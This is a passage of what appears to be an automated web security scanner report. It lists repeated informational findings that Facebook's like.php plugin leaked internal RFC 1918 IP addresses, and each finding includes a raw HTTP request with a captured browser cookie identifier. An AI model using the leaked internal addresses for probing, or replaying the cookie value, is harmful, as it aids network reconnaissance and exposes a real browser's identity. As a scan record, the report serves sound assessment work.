GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30155a9dc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.806. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.56

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f2e355%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.807. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1edb4a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.808. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.59

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df73ab0edc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.809. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.21.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3230385f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.810. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.91.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df205bff114%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.811. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.212.104

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f55b4638%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.812. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.201.58

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27e1b8fa8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.813. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.250.37

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc1657c04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.814. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.193.33

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0b8eb68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.815. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.191.30

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a803aa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702303714704576384051388321740.html%3Fmod%3DWSJ_hp_mostpop_read&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.816. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.74.34

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d1b752b%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.817. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.25.42

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2060f74%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2F10-most-affordable-10-most-expensive-home-markets%2F716B48DB-AE22-440C-BB99-3102EC1163C5.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.818. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.253.54

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df275ca5b78%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.819. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.126.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df706975%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.820. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.245.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b6c243ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.821. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.49.51

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df316483ae%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.822. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.131.123

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bcdaa0cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.823. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.35.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dad6e6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.824. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.190.126

Request

